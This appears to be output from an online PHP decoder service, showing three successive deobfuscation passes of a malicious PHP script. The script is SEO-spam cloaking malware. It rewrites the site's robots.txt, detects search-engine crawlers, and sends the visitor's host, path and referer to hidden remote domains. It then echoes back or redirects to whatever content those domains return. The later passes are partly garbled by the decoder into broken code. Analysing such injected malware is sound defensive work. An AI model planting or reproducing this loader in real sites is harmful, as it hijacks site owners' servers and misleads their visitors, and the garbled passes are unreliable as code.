Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


Show other level 

goto AiyBt; tHDhM: $http = is_https() ? "https" : "http"; goto jcaG7; BlwyJ: function create_robots($url) { $functions = func(); $path = $_SERVER["DOCUMENT_ROOT"] . "/robots.txt"; $content = "User-agent: *
Allow: /\xa\xaSitemap: " . $url . "/sitemap.xml
"; if (!file_exists($path)) { $functions[0]($path, $content); } else { $existing_content = $functions[1]($path); if ($existing_content !== $content) { $functions[0]($path, $content); } } } goto S74OS; epjQi: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto T6Ol3; AY18S: $html_content = request($xmlname, $param); goto Mvq5i; T_yso: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } if (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } goto YG3Bm; WfHH4: $model = stristr($duri, "/?") ? "?" : $model; goto EO2Yo; gXcK4: $host = $_SERVER["HTTP_HOST"] ?: ''; goto giz8Y; Xz9u1: function disbot() { $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : ''; $bots = array("googlebot", "bing", "yahoo", "google"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto T_yso; g5glL: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/index.php", '', $duri); $duri = str_replace("!", '', $duri); } goto nV7P5; YG3Bm: function is_https() { if (isset($_SERVER["HTTPS"])) { $https = strtolower($_SERVER["HTTPS"]); if ($https !== "off" && $https !== '') { return true; } } if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) { $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]); if ($front_end_https !== "off" && $front_end_https !== '') { return true; } } return false; } goto BlwyJ; rZaS2: $model_file = "index.php"; goto s7LxX; AiyBt: $xmlname = array("%32+3%32%31%2D%79/6%61%78%32%30%32*E%65/6.3.2%61.C%2E%.2%63", "+2+3+2%31%2D/9%.1%78%%%32%2E%79.8%7A.1%%65%%72*E.7%%63", "+2%33%32%%2D%79%%61/8%32%%32*E%6E%68%%72%79%76.6.3*E%6B%6C.D", "%32%+2%31%2D%79%76%%78%%30%%2E%66%%79%69%65%6E%%2E%6B%6C.D"); goto EAqkg; Mvq5i: if (strpos($html_content, "nobotuseragent") === false) { $response_handlers = array("okhtml" => array("header" => "Content-type: text/html; charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent500page" => array("header" => "HTTP/1.1 500 Internal Server Error"), "404page" => array("header" => "HTTP/1.1 4 Not Found"), "301page" => array("header" => "HTTP/1.1 3 Moved Permanently", "replace" => "3page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml; charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["header"]); if (isset($handler["replace"])) { $html_content = str_replace($handler["replace"], '', $html_content); } if (isset($handler["test_echo"]) && $istest) { echo $string; } if (isset($handler["redirect"])) { header("Location: " . $html_content); } elseif (isset($handler["output"])) { echo $html_content; } die; } } } goto Xz9u1; T6Ol3: if (!empty($matches)) { $model_file = $matches[1]; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/"); } $model = str_replace(".php", '', $model_file); } goto WfHH4; EAqkg: $string = "21-link202"; goto gXcK4; P9sHk: $zz = disbot(); goto Jw2LI; EO2Yo: $istest = false; goto DPnnk; O43DA: $referer = $_SERVER["HTTP_REFERER"] ?: ''; goto tHDhM; N1l4L: create_robots($http . "://" . $host); goto AY18S; S74OS: function request($webs, $param) { $functions = func(); shuffle($webs); foreach ($webs as $domain) { $domain_decoded = $functions[2](urldecode($domain)); $url = "http://" . $domain_decoded . "/super6.php?" . $param; if (function_exists("wp_remote_get")) { $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla/5.0 (compatible; WordPress)")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("allow_url_fopen")) { $context = stream_context_create(array("http" => array("timeout" => 30))); $response = @$functions[1]($url, false, $context); if ($response !== false) { return $response; } } } return "nobotuseragent"; } goto M2_cT; DPnnk: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto g5glL; Jw2LI: $duri = drequest_uri() ?: "/"; goto rZaS2; nV7P5: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "lang" => $lang, "server" => $server, "model" => $model, "version" => $istest ? $string : '')); goto N1l4L; s7LxX: $model = "index"; goto epjQi; jcaG7: $server = file_exists($_SERVER["DOCUMENT_ROOT"] . "/.htaccess") ? 1 : 2; goto P9sHk; giz8Y: $lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"] ?: "en"; goto O43DA; M2_cT: function func() { $chars = range("a", "z"); return array($chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[15] . $chars[20] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[5] . $chars[8] . $chars[11] . $chars[4] . "_" . $chars[6] . $chars[4] . $chars[19] . "_" . $chars[2] . $chars[14] . $chars[13] . $chars[19] . $chars[4] . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . $chars[14] . $chars[19] . ""); }

goto AiyBt; tHDhM: $http = is_https() ? "https" : "http"; goto jcaG7; BlwyJ: function create_robots($url) {  $path = $_SERVER["DOCUMENT_ROOT"] . "/robotstxt"; $content = "User-agent: *
Allow: /\xa\xaSitemap: " . $url . "/sitemapxml
"; if (!file_exists($path)) { "f"($path, $content); } else { $existing_content = "u"($path); if ($existing_content !== $content) { "f"($path, $content); } } } goto S74OS; epjQi: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto T6Ol3; AY18S: $html_content = request($xmlname, $param); goto Mvq5i; T_yso: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } if (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } goto YG3Bm; WfHH4: $model = stristr($duri, "/?") ? "?" : $model; goto EO2Yo; gXcK4: $host = $_SERVER["HTTP_HOST"] ?: ''; goto giz8Y; Xz9u1: function disbot() { $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : ''; $bots = array("googlebot", "bing", "yahoo", "google"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto T_yso; g5glL: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/indexphp", '', $duri); $duri = str_replace("!", '', $duri); } goto nV7P5; YG3Bm: function is_https() { if (isset($_SERVER["HTTPS"])) { $https = strtolower($_SERVER["HTTPS"]); if ($https !== "off" && $https !== '') { return true; } } if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) { $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]); if ($front_end_https !== "off" && $front_end_https !== '') { return true; } } return false; } goto BlwyJ; rZaS2: $model_file = "indexphp"; goto s7LxX; AiyBt: $xmlname = array("%32+3%32%31%2D%79/6%61%78%32%30%32*E%65/632%61C%2E%.2%63", "+2+3+2%31%2D/9%.1%78%%%32%2E%798%7A1%%65%%72*E7%%63", "+2%33%32%%2D%79%%61/8%32%%32*E%6E%68%%72%79%7663*E%6B%6CD", "%32%+2%31%2D%79%76%%78%%30%%2E%66%%79%69%65%6E%%2E%6B%6CD"); goto EAqkg; Mvq5i: if (strpos($html_content, "nobotuseragent") === false) { $response_handlers = array("okhtml" => array("header" => "Content-type: text/html; charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent500page" => array("header" => "HTTP/11 500 Internal Server Error"), "404page" => array("header" => "HTTP/11 4 Not Found"), "301page" => array("header" => "HTTP/11 3 Moved Permanently", "replace" => "3page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml; charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["header"]); if (isset($handler["replace"])) { $html_content = str_replace($handler["replace"], '', $html_content); } if (isset($handler["test_echo"]) && $istest) { echo $string; } if (isset($handler["redirect"])) { header("Location: " . $html_content); } elseif (isset($handler["output"])) { echo $html_content; } die; } } } goto Xz9u1; T6Ol3: if (!empty($matches)) { $model_file = "u"; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/"); } $model = str_replace(".php", '', $model_file); } goto WfHH4; EAqkg: $string = "21-link202"; goto gXcK4; P9sHk: $zz = disbot(); goto Jw2LI; EO2Yo: $istest = false; goto DPnnk; O43DA: $referer = $_SERVER["HTTP_REFERER"] ?: ''; goto tHDhM; N1l4L: create_robots($http . "://" . $host); goto AY18S; S74OS: function request($webs, $param) {  shuffle($webs); foreach ($webs as $domain) { $domain_decoded = "n"(urldecode($domain)); $url = "http://" . $domain_decoded . "/super6php?" . $param; if (function_exists("wp_remote_get")) { $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla/50 (compatible; WordPress)")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("allow_url_fopen")) { $context = stream_context_create(array("http" => array("timeout" => 30))); $response = @"u"($url, false, $context); if ($response !== false) { return $response; } } } return "nobotuseragent"; } goto M2_cT; DPnnk: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto g5glL; Jw2LI: $duri = drequest_uri() ?: "/"; goto rZaS2; nV7P5: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "lang" => $lang, "server" => $server, "model" => $model, "version" => $istest ? $string : '')); goto N1l4L; s7LxX: $model = "index"; goto epjQi; jcaG7: $server = file_exists($_SERVER["DOCUMENT_ROOT"] . "/.htaccess") ? 1 : 2; goto P9sHk; giz8Y: $lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"] ?: "en"; goto O43DA; M2_cT: function func() { $chars = range("a", "z"); return array(")" . $chars[8] . $chars[11] . "(_" . $chars[15] . $chars[20] . $chars[19] . "_n" . $chars[14] . $chars[13] . $chars[19] . "(" . $chars[13] . $chars[19] . $chars[18], ")" . $chars[8] . $chars[11] . "(_" . $chars[6] . "(" . $chars[19] . "_n" . $chars[14] . $chars[13] . $chars[19] . "(" . $chars[13] . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . $chars[14] . $chars[19] . ""); }

goto AiyBt; tHDhM: $http = is_https() ? "https" : "http"; goto jcaG7; BlwyJ: function create_robots($url) {  $path = $_SERVER["DOCUMENT_ROOT"] . "/robotstxt"; $content = "User-agent: *
Allow: /\xa\xaSitemap: " . $url . "/sitemapxml
"; if (!file_exists($path)) { "f"($path, $content); } else { $existing_content = "u"($path); if ($existing_content !== $content) { "f"($path, $content); } } } goto S74OS; epjQi: preg_match("/\/([^\/]+\.php)/", $duri, $matches); goto T6Ol3; AY18S: $html_content = request($xmlname, $param); goto Mvq5i; T_yso: function drequest_uri() { if (isset($_SERVER["REQUEST_URI"])) { return $_SERVER["REQUEST_URI"]; } if (isset($_SERVER["argv"])) { return $_SERVER["PHP_SELF"] . "?" . $_SERVER["argv"][0]; } return $_SERVER["PHP_SELF"] . "?" . $_SERVER["QUERY_STRING"]; } goto YG3Bm; WfHH4: $model = stristr($duri, "/?") ? "?" : $model; goto EO2Yo; gXcK4: $host = $_SERVER["HTTP_HOST"] ?: ''; goto giz8Y; Xz9u1: function disbot() { $user_agent = isset($_SERVER["HTTP_USER_AGENT"]) ? strtolower($_SERVER["HTTP_USER_AGENT"]) : ''; $bots = array("googlebot", "bing", "yahoo", "google"); foreach ($bots as $bot) { if (strpos($user_agent, $bot) !== false) { return 1; } } return 2; } goto T_yso; g5glL: if ($duri != "/") { $duri = str_replace("/" . $model_file, '', $duri); $duri = str_replace("/indexphp", '', $duri); $duri = str_replace("!", '', $duri); } goto nV7P5; YG3Bm: function is_https() { if (isset($_SERVER["HTTPS"])) { $https = strtolower($_SERVER["HTTPS"]); if ($https !== "off" && $https !== '') { return true; } } if (isset($_SERVER["HTTP_X_FORWARDED_PROTO"]) && $_SERVER["HTTP_X_FORWARDED_PROTO"] === "https") { return true; } if (isset($_SERVER["HTTP_FRONT_END_HTTPS"])) { $front_end_https = strtolower($_SERVER["HTTP_FRONT_END_HTTPS"]); if ($front_end_https !== "off" && $front_end_https !== '') { return true; } } return false; } goto BlwyJ; rZaS2: $model_file = "indexphp"; goto s7LxX; AiyBt: $xmlname = array("%32+3%32%31%2D%79/6%61%78%32%30%32*E%65/632%61C%2E%.2%63", "+2+3+2%31%2D/9%.1%78%%%32%2E%798%7A1%%65%%72*E7%%63", "+2%33%32%%2D%79%%61/8%32%%32*E%6E%68%%72%79%7663*E%6B%6CD", "%32%+2%31%2D%79%76%%78%%30%%2E%66%%79%69%65%6E%%2E%6B%6CD"); goto EAqkg; Mvq5i: if (strpos($html_content, "nobotuseragent") === false) { $response_handlers = array("okhtml" => array("header" => "Content-type: text/html; charset=utf-8", "replace" => "okhtml", "test_echo" => true, "output" => true), "getcontent500page" => array("header" => "HTTP/11 500 Internal Server Error"), "404page" => array("header" => "HTTP/11 4 Not Found"), "301page" => array("header" => "HTTP/11 3 Moved Permanently", "replace" => "3page", "redirect" => true), "okxml" => array("header" => "Content-Type: application/xml; charset=utf-8", "replace" => "okxml", "output" => true), "okrobots" => array("header" => "Content-Type: text/plain", "replace" => "okrobots", "output" => true)); foreach ($response_handlers as $key => $handler) { if (strpos($html_content, $key) !== false) { @header($handler["header"]); if (isset($handler["replace"])) { $html_content = str_replace($handler["replace"], '', $html_content); } if (isset($handler["test_echo"]) && $istest) { echo $string; } if (isset($handler["redirect"])) { header("Location: " . $html_content); } elseif (isset($handler["output"])) { echo $html_content; } die; } } } goto Xz9u1; T6Ol3: if (!empty($matches)) { $model_file = "u"; if (($position = strpos($duri, $model_file)) !== false) { $model_file = ltrim(substr($duri, 0, $position + strlen($model_file)), "/"); } $model = str_replace(".php", '', $model_file); } goto WfHH4; EAqkg: $string = "21-link202"; goto gXcK4; P9sHk: $zz = disbot(); goto Jw2LI; EO2Yo: $istest = false; goto DPnnk; O43DA: $referer = $_SERVER["HTTP_REFERER"] ?: ''; goto tHDhM; N1l4L: create_robots($http . "://" . $host); goto AY18S; S74OS: function request($webs, $param) {  shuffle($webs); foreach ($webs as $domain) { $domain_decoded = "n"(urldecode($domain)); $url = "http://" . $domain_decoded . "/super6php?" . $param; if (function_exists("wp_remote_get")) { $response = wp_remote_get($url, array("timeout" => 30, "user-agent" => "Mozilla/50 (compatible; WordPress)")); if (!is_wp_error($response)) { $body = wp_remote_retrieve_body($response); return $body; } } if (function_exists("curl_init")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); if (!curl_errno($ch)) { curl_close($ch); return $response; } curl_close($ch); } if (ini_get("allow_url_fopen")) { $context = stream_context_create(array("http" => array("timeout" => 30))); $response = @"u"($url, false, $context); if ($response !== false) { return $response; } } } return "nobotuseragent"; } goto M2_cT; DPnnk: if (strpos($duri, $string) !== false) { $zz = 1; $duri = str_replace($string, '', $duri); $istest = true; } goto g5glL; Jw2LI: $duri = drequest_uri() ?: "/"; goto rZaS2; nV7P5: $param = http_build_query(array("web" => $host, "zz" => $zz, "uri" => urlencode($duri), "urlshang" => $referer, "http" => $http, "lang" => $lang, "server" => $server, "model" => $model, "version" => $istest ? $string : '')); goto N1l4L; s7LxX: $model = "index"; goto epjQi; jcaG7: $server = file_exists($_SERVER["DOCUMENT_ROOT"] . "/.htaccess") ? 1 : 2; goto P9sHk; giz8Y: $lang = $_SERVER["HTTP_ACCEPT_LANGUAGE"] ?: "en"; goto O43DA; M2_cT: function func() {  return array(")""(_" . $chars[15] . $chars[20] . $chars[19] . "_n)"" . $chars[19] . "("" . $chars[19] . $chars[18], ")""(_"(" . $chars[19] . "_n)"" . $chars[19] . "("" . $chars[19] . $chars[18], $chars[18] . $chars[19] . $chars[17] . "_" . $chars[17] . ")" . $chars[19] . ""); }


© 2023 Quttera Ltd. All rights reserved.